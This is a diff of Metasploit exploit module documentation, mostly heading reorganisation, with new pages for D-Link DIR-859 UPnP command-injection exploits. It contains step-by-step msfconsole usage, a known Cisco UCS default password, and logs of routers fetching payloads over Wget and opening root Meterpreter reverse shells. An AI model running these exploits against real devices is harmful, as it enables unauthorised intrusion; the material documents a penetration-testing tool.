+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lport 4444
+  lport => 4444
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [*] Sending stage (3021284 bytes) to 192.168.224.164
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
+
+  meterpreter >
+```
+
+## Targets
+```
+  Id  Name 
+  --  ----
+  0   Bash Completion
+  1   Cron
+```
+
+## References
+  1. <https://www.exploit-db.com/exploits/35513>
+  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>

documentation/modules/exploit/linux/snmp/awind_snmp_exec.md

@@ -1,11 +1,9 @@
-## Description
+## Vulnerable Application
 
 This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to `ftpfw.sh` system command, leading to command injection.
 
 Note: a valid SNMP read-write community is required to exploit this vulnerability.
 
-## Vulnerable Devices
-
 The following devices are known to be affected by this issue:
 
 * Crestron Airmedia AM-100 <= version 1.5.0.4
@@ -18,7 +16,7 @@ The following devices are known to be affected by this issue:
 
 Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.
 
-## Verification steps
+## Verification Steps
 
 1. Start `msfconsole`
 2. Do: `use exploit/linux/snmp/awind_snmp_exec`
@@ -66,8 +64,3 @@ Architecture : armv6l
 BuildTuple   : armv5l-linux-musleabi
 Meterpreter  : armle/linux
 ```
-
-## References
-
-* https://github.com/QKaiser/awind-research
-* https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/

documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md

@@ -15,6 +15,7 @@
   8. You should get a session
 
 ## Options
+
   **FILEPATH**  
   The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
   
@@ -37,7 +38,7 @@
 
 
   
-## Scenario
+## Scenarios
 
   ```
   msf > use exploit/linux/snmp/net_snmpd_rw_access 

documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 
 This module abuses a known default password on Cisco UCS Director. The 'scpuser'
 has the password of 'scpuser', and allows an attacker to login to the virtual appliance
@@ -9,20 +9,7 @@ Note that Cisco also mentions in their advisory that their IMC Supervisor and
 UCS Director Express are also affected by these vulnerabilities, but this module
 was not tested with those products.
 
-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred
-https://seclists.org/fulldisclosure/2019/Aug/36
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
-
-
-## Usage
+## Scenarios
 
 Setup RHOST and run it!
 

documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md

@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands.
+The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID
+or URN headers of a M-SEARCH UPnP request.
+
+Get a [D-Link router/vulnerable firmware](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147),
+or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `set TARGET <URN/UUID>`
+7. Do: `run`
+8. You should get a session as `root`.
+
+## Options
+
+**VECTOR**
+
+This option denotes which header will be used in the request (UUID or URN)
+that triggers the vulnerability.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+
+```
+msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://0.0.0.0:8080/38YWEX2
+[*] Local IP: http://192.168.70.28:8080/38YWEX2
+[*] Target Payload URN
+[*] Client 192.168.0.1 (Wget) requested /38YWEX2
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
+[*] Server stopped.
+meterpreter > 
+```

documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md

@@ -0,0 +1,42 @@
+## Introduction
+
+This module exploits CVE.2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-link SOHO routers via the `service` argument to the `gena.cgi` URL.
+
+## Vulnerable Application
+
+Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/upnp/dlink_dir859_subscribe_exec`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `run`
+7. You should get a session as `root`.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+```
+msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run 
+
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
+[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
+[*] Server stopped.
+
+meterpreter > getuid 
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo 
+Computer     : 192.168.0.1
+OS           :  (Linux 2.6.32.70)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter >
+```